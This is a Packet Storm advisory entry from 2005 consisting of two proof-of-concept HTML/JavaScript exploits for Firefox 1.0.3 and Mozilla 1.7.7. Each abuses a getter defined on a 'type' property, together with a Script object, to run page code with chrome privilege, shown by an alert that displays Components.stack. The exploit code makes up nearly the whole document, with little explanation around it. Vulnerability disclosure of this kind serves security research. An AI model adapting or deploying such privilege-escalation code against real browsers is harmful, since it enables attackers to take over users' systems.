firefoxSploit-2.txt

2005-05-27T00:00:00
ID PACKETSTORM:37322
Type packetstorm
Reporter moz_bug_r_a4
Modified 2005-05-27T00:00:00

Description

                                        
                                            `<html>  
<head>  
<title>Proof-of-Concept for Firefox 1.0.3 - by moz_bug_r_a4</title>   
<body>  
<script>  
// it needs chrome privilege to get |Components.stack|  
var code = "alert('Exploit!\\n\\n' + Components.stack);";  
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');  
var scriptCode = "arguments.callee.__parent__.eval('" + evalCode + "');'';";  
  
var script = (function() {  
function x() { new Object(); }  
return new Script(scriptCode);  
})();  
  
document.body.__defineGetter__("type", function() {  
return { toString : script };  
});  
  
var event = document.createEvent("Events");  
event.initEvent("PluginNotFound", true, true);  
document.body.dispatchEvent(event);  
</script>  
</body>  
  
-----------------------------------------------------------------------------------------  
  
<html>  
<head>  
<title>Proof-of-Concept for Mozilla 1.7.7 - by moz_bug_r_a4</title>   
<body>  
  
<div id="d"></div>  
<pre>  
Click on the red box.  
</pre>  
  
<script>  
// it needs chrome privilege to get |Components.stack|  
var code = "alert('Exploit!\\n\\n' + Components.stack);";  
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');  
var scriptCode = "arguments.callee.__parent__.eval('" + evalCode + "');'';";  
  
var script = (function() {  
function x() { new Object(); }  
return new Script(scriptCode);  
})();  
  
var xulns = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul";  
var node = document.createElementNS(xulns, "input");  
  
node.__defineGetter__("type", function() {  
return { toString : script };  
});  
  
node.style.width = "100px";  
node.style.height = "100px";  
node.style.backgroundColor = "#f00";  
document.getElementById("d").appendChild(node);  
</script>  
</body>  
  
  
`